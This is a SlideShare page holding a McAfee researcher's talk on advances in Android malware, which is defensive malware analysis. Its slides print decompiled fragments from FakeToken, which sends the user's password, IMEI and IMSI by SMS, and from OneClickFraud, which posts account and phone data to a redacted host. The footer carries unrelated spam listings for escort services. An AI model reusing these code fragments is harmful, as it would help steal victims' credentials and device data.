SlideShare ist ein Scribd-Unternehmen logo

Isn't it all just SMS-sending trojans?: Real Advances in Android Malware

Jimmy Shah
Jimmy Shah

Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.

Mobil
1 von 27
Downloaden Sie, um offline zu lesen
McAfee Confidential—Internal Use Only Isn't it all just SMS-sending trojans?: Real advances in Android Malware Jimmy Shah Mobile Security Researcher
Let's look at the numbers
Not just malware ... 0.0% 10.0% 20.0% 30.0% 40.0% 50.0% 60.0% 70.0% 80.0% 90.0% 100.0% 49.3% 50.7% Malware vs PUP
Almost everything but SMS-sending trojans Send Handset Info Spyware Adware Sends Premium SMS Fraud Exploit Rooting malware Backdoor/Botnet HackTool Downloader/Installer 0.0% 5.0% 10.0% 15.0% 20.0% 25.0% 30.0% 35.0% 40.0% 45.0% 42.0% 21.7% 8.7% 18.8% 2.9% 23.2% 2.9% 27.5% 4.3% 10.1% By Category
Attacker Tricks
Attacker Tricks - Encryption • Simple – Obfuscations • Hiding SMS numbers/message text within plaintext HTML files – Substitution cipher • Config file containing encrypted SMS numbers/message text <link rel="stylesheet" type="text/css" href="/en/shar ed/core/2/css/css.ashx?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;cspSearchComponent ;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"> </script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c <SMS#>::<MSG>::241.55руб. <SMS#>::<MSG>::173.88руб. <SMS#>::<MSG>::86.00руб.
Attacker Tricks - Encryption • Complex – Symmetric cipher • DES • Encrypt URL queries and C&C commands • Encrypt/decrypt config file – URLs, next connect time – Encrypt/decrypt C&C commands – Decrypt root exploits byte abyte1[] = k.b; DESKeySpec deskeyspec = new DESKeySpec(abyte1); javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec); Cipher cipher = Cipher.getInstance("DES"); b = cipher; cipher.init(2, secretkey);
Attacker Tricks – Fraud • Pretending to be a legitimate app – Not the same as injecting malicious code – New or reused code that simulates the real app • Includes malicious functions • Almost just malicious code ./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class ./com/example/android/service/R$id.class ./com/example/android/service/R$raw.class ./com/example/android/service/Main$KitchenTimerReceiver.class ./com/example/android/service/KitchenTimerService$2.class ./com/example/android/service/R$attr.class ./com/example/android/service/R$layout.class ./com/example/android/service/R.class ./com/example/android/service/Main.class ./com/example/android/service/R$drawable.class ./com/example/android/service/KitchenTimerService$1.class ./com/example/android/service/KitchenTimerService.class ./com/example/android/service/Main$1.class ./com/example/android/service/R$string.class ./token/bot/StartSettings.class ./token/bot/WebApi.class ./token/bot/CatchResult.class ./token/bot/SendSmsResult.class ./token/bot/SettingsSet.class ./token/bot/ScreenItem.class ./token/bot/AutorunReceiver.class ./token/bot/ServerResponse.class ./token/bot/MainActivity.class ./token/bot/ThreadOperation.class ./token/bot/AlarmReceiver.class ./token/bot/ThreadOperationListener.class ./token/bot/SmsReciver.class ./token/bot/MainApplication.class ./token/bot/MainService.class ./token/bot/SmsItem.class ./token/bot/HttpParam.class ./token/bot/Settings.class ./token/bot/UpdateActivity.class ./token/bot/MainActivity$1.class Android/OneClickFraud Android/FakeToken
Attacker Tricks – Fraud • Android/FakeToken – Fake security token app • Customized for different banks – App asks for the user's password and displays fake soft token public void sendPass(String paramString) { try { if (!Settings.saved.sendInitSms) { Settings.saved.sendInitSms = true; String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString; MainService.sendSms(Settings.saved.number, str); MainApplication.settings.save(this.context); } new Thread(new ThreadOperation(this, 1, paramString)).start(); label109: return; } catch (Exception localException) { break label109; } }
Attacker Tricks – Fraud • Android/OneClickFraud – Fake adult entertainment app • App asks for the user to pay for a subscription to the adult site – Repeats every 5 minutes public void onReceive(Context paramContext, Intent paramIntent) { kitchenTimerService.schedule(300000L); setContentView(2130903040); Account[] arrayOfAccount;
Attacker Tricks – Fraud • Android/OneClickFraud – Sends user information including Google account to the attacker if (ctf.intValue() == 0) { Main localMain = Main.this; Integer localInteger = Integer.valueOf(1); localMain.ctf = localInteger; TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); arrayOfAccount = AccountManager.get(Main.this).getAccounts(); str1 = ""; int i = arrayOfAccount.length; j = 0; if (j >= i) { String str2 = doPost("http://<removed>", ""); StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>"); String str3 = localTelephonyManager.getDeviceId(); StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno="); String str4 = localTelephonyManager.getLine1Number(); Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2); Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1); startActivity(localIntent1); boolean bool = moveTaskToBack(1); } }
4/19/1212 Attacker Tricks - Injecting code • Android/Moghava.A – Malicious code injected into a legitimate app • Recipes for Iranian meals
4/19/1213 Attacker Tricks - Injecting code • Android/Moghava.A – Real virus • Overwriting file infector – Not executable files, just image files » Specifically all of your JPGs » Designed to “photo bomb” all your photos with the Ayotollah Khomeni • Code injection: – Buggy • Doesn't check if it's infected a file before ./com/Moghava/kicker.smali ./com/Moghava/stamper$1.smali ./com/Moghava/stamper$1$1.smali ./com/Moghava/stamper.smali ./ir/sharif/iranianfoods/R$attr.smali ./ir/sharif/iranianfoods/R$styleable.smali ./ir/sharif/iranianfoods/R$menu.smali ./ir/sharif/iranianfoods/ListItemAdapter.smali ./ir/sharif/iranianfoods/IranData.smali ./ir/sharif/iranianfoods/Touch$AddImgAdp.smali ./ir/sharif/iranianfoods/TabHostActivity.smali ./ir/sharif/iranianfoods/Constants.smali
4/19/1214 Attacker Tricks - Injecting code localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505); localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath()); int m = localBitmap2.getWidth(); int n = localBitmap1.getWidth(); int i1 = m; int i2 = n; if (i1 > i2) { i3 = localBitmap2.getWidth(); i4 = localBitmap2.getHeight(); label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888; localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig); Canvas localCanvas = new Canvas(localBitmap3); float f1 = 0.0F; float f2 = 0.0F; Paint localPaint1 = null; localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1); float f3 = 100.0F; float f4 = 300.0F; Paint localPaint2 = null; localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2); }
4/19/1215 Attacker Tricks - Injecting code Credit: Mark Peters (Flickr ID - sneakerdog)
4/19/1216 Attacker Tricks – Recording Audio • Audio – DTMF(“Touch Tones”) – Telephone Calls • Initially used in academic PoCs – SoundComber • DB of IVR Converted DTMF • January 2011 • Very common in spyware • Used in malware
4/19/1217 Attacker Tricks – Recording Audio • Android/Nickispy – Records to AMR files – August 2011 • Android/GoldenEagle – Records to AMR files – September 2011 • Audio recording benefits – Trade secrets – CC# – PINs
4/19/1218 Attacker Tricks - Malware Updates • Malware authors are now including update functionality – Keeping the profits rolling in and maintaining control of devices – Initially just used by mobile botnet clients • Generally only requires the permission INSTALL_PACKAGES • android.permission.INSTALL_PACKAGES • There are two main ways users are attacked – Fake legitimate updates • Ex: SYSTEM_PATCH, Android_4.0_patch • Really just trojan horses – Malware updating itself • More functions – Send sensitive user info – Exfiltrate data • New/patched payloads – Exploits
4/19/1219 Attacker Tricks - Malware Updates • Real malware updates – Because even the bad guys understand that sometimes you need to patch • Usually not visual – Don't inform the users/victims – Don't depend on users to approve updates
4/19/1220 Academic Research - Taplogger • Taplogger – Combination training and attack app • Reads accelerometer for keypresses • Training app is a fake icon matching game – High score = trained it to steal your pin • Two attacks – Number pad logging » PINs, CC#s,etc. – Password stealing » Screen unlock – Previous research • Touchlogger – Two parts – training and logging • ACCessory – Detects full keyboard
4/19/1221 Academic Research - Taplogger
Attacker Tricks - Rooting Exploits • Rooting Android – Good for improving security, but can leave you open to attack – Replacing firmware – Removing bloatware and security vulnerabilities • Most attackers are not interested in developing their own exploits – Function of slow patching on Android and number of parties involved in releasing new firmware • “too many chefs in the kitchen” – Leads to the same three or four common exploits and minor modifications Exploit Detected as PSneuter Exploit/RetuenSP.A Gingerbreak Exploit/Voldbrk, 18 minor variants of the same exploit Exploid Exploit/Lvedu, 26 minor variants RageAgainstTheCage Exploit/Diutes, 5 minor variants
Attacker Tricks – Server-Side Polymorphism • Server-side – Uses larger resources server side vs. lower powered devices – Modifying DEX files • Manual changes – Renaming source and recompiling • Automated changes – Easier than it sounds – Scriptable text changes in source
Attacker Tricks – Server-Side Polymorphism • One major family: Android/FakeInstaller • Main generic signature • Supplementary detections for 25 variants • Changes – By day – By hour
Acknowledgements
Acknowledgments • Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware

Empfohlen

Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
Automotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerAutomotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerForAllSecure
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014Flavio Eduardo de Andrade Goncalves
 
MIT-6-determina-vps.ppt
MIT-6-determina-vps.pptMIT-6-determina-vps.ppt
MIT-6-determina-vps.pptwebhostingguy
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014Flavio Eduardo de Andrade Goncalves
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
A tale of mobile threats
A tale of mobile threatsA tale of mobile threats
A tale of mobile threatsVincenzo Iozzo
 

Empfohlen

Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
Automotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerAutomotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerForAllSecure
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014Flavio Eduardo de Andrade Goncalves
 
MIT-6-determina-vps.ppt
MIT-6-determina-vps.pptMIT-6-determina-vps.ppt
MIT-6-determina-vps.pptwebhostingguy
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014Flavio Eduardo de Andrade Goncalves
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
A tale of mobile threats
A tale of mobile threatsA tale of mobile threats
A tale of mobile threatsVincenzo Iozzo
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
 
Web Security
Web SecurityWeb Security
Web SecurityBharath Manoharan
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesYOU SHENG CHEN
 
Better watch your apps - MJ Keith
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keithm j
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush GuptaTenet Systems Pvt Ltd
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityYour Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
 
The FatRat
The FatRatThe FatRat
The FatRatAjilSunny
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its DefenceGreater Noida Institute Of Technology
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Cyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxCyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxDrMajidMumtaz
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking PresentationAnimesh Behera
 
Outsmarting smartphones
Outsmarting smartphonesOutsmarting smartphones
Outsmarting smartphonesSensePost
 
Digital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's OutreachDigital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's OutreachZero Science Lab
 
Cant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless cardCant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
 
Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)Jimmy Shah
 
There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
 

Weitere ähnliche Inhalte

Ähnlich wie Isn't it all just SMS-sending trojans?: Real Advances in Android Malware

The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesYOU SHENG CHEN
 
Better watch your apps - MJ Keith
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keithm j
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityYour Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Cyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxCyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxDrMajidMumtaz
 
Outsmarting smartphones
Outsmarting smartphonesOutsmarting smartphones
Outsmarting smartphonesSensePost
 
Digital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's OutreachDigital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's OutreachZero Science Lab
 
Cant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless cardCant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
 

Ähnlich wie Isn't it all just SMS-sending trojans?: Real Advances in Android Malware (20)

The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
 
Web Security
Web SecurityWeb Security
Web Security
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devices
 
Better watch your apps - MJ Keith
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keith
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityYour Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Cyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxCyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptx
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
Outsmarting smartphones
Outsmarting smartphonesOutsmarting smartphones
Outsmarting smartphones
 
Digital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's OutreachDigital Signage Systems - The Modern Hacker's Outreach
Digital Signage Systems - The Modern Hacker's Outreach
 
Cant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless cardCant touch this: cloning any Android HCE contactless card
Cant touch this: cloning any Android HCE contactless card
 

Mehr von Jimmy Shah

Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)Jimmy Shah
 
There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
 
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTBYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTJimmy Shah
 
Solar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experimentSolar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experimentJimmy Shah
 
Mobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmMobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmJimmy Shah
 
Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_Jimmy Shah
 
Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'Jimmy Shah
 
Smartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkitsSmartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkitsJimmy Shah
 

Mehr von Jimmy Shah (8)

Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)Brick all the internet of things!(with notes)
Brick all the internet of things!(with notes)
 
There's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleepThere's no S(ecurity) in IoT: This is why we can't sleep
There's no S(ecurity) in IoT: This is why we can't sleep
 
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTBYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT
 
Solar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experimentSolar Powered Parking Meters - An IoT thought experiment
Solar Powered Parking Meters - An IoT thought experiment
 
Mobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vmMobile malware analysis with the a.r.e. vm
Mobile malware analysis with the a.r.e. vm
 
Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_Viruses on mobile platforms why we don't/don't we have viruses on android_
Viruses on mobile platforms why we don't/don't we have viruses on android_
 
Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'Mobile malware heuristics the path from 'eh' to pretty good'
Mobile malware heuristics the path from 'eh' to pretty good'
 
Smartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkitsSmartphone Ownage: The state of mobile botnets and rootkits
Smartphone Ownage: The state of mobile botnets and rootkits
 

Kürzlich hochgeladen

9892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x79892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x7Pooja Nehwal
 
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost Lover
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost LoverPowerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost Lover
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost LoverPsychicRuben LoveSpells
 
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCR
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCRFULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCR
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCRnishacall1
 
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceCALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceanilsa9823
 
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Pooja Nehwal
 
BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 71 Noida Escorts >༒8448380779 Escort ServiceDelhi Call girls
 
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceCALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceanilsa9823
 

Kürzlich hochgeladen (7)

9892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x79892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x7
 
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost Lover
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost LoverPowerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost Lover
Powerful Love Spells in Arkansas, AR (310) 882-6330 Bring Back Lost Lover
 
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCR
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCRFULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCR
FULL ENJOY - 9999218229 Call Girls in {Mahipalpur}| Delhi NCR
 
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceCALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
 
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
 
